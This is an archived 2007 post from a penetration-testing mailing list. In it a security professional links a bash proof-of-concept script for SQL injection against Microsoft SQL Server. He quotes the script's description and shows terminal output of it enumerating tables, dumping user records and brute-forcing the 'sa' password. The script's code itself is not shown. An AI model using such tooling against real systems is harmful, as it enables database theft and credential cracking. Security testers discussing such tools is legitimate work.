Penetration Testing mailing list archives

Re: Open Source SQL Inject, XSS, Remote File Include Testing

From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 21 May 2007 13:45:41 +0200 (ora solare Europa occidentale)

On Sat, 19 May 2007, winsoc wrote:

Can anyone recommend a quick and cheerful Open Source Tool which willtest websites for SQL Injection, XSS, Remote File Include.

Speaking of SQL injection, just wanted to point out a bash script i puttogether while pen-testing some web applications that use MS SQL Server asback-end:


http://www.0xdeadbeef.info/code/mssql-hax0r

# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational mode are currently available:
# info (Information Gathetering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).

You shouldn't expect anything too fancy (it's still v0.1 after all;), butit does its job:


root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
        Accounting (id:390494850)
                CanoneAnnuo (money)
                CodiceFornitore (varchar)
                dataInsert (datetime)
                GroupId (char) *
                GroupInsert (varchar)
                idAccount (varchar)
                idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.

root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.

aaa
bbb
ccc
password

Password of 'sa' user is 'password'!;)

Enjoy,

--
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------

Current thread:

Open Source SQL Inject, XSS, Remote File Include Testing winsoc (May 19)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing jgervacio (May 20)
  - Re: Open Source SQL Inject, XSS, Remote File Include Testing Nikhil Wagholikar (May 21)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Rodrigo Montoro (Sp0oKeR) (May 21)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Marco Ivaldi (May 21)
  - Re: Open Source SQL Inject, XSS, Remote File Include Testing Marco Ivaldi (May 24)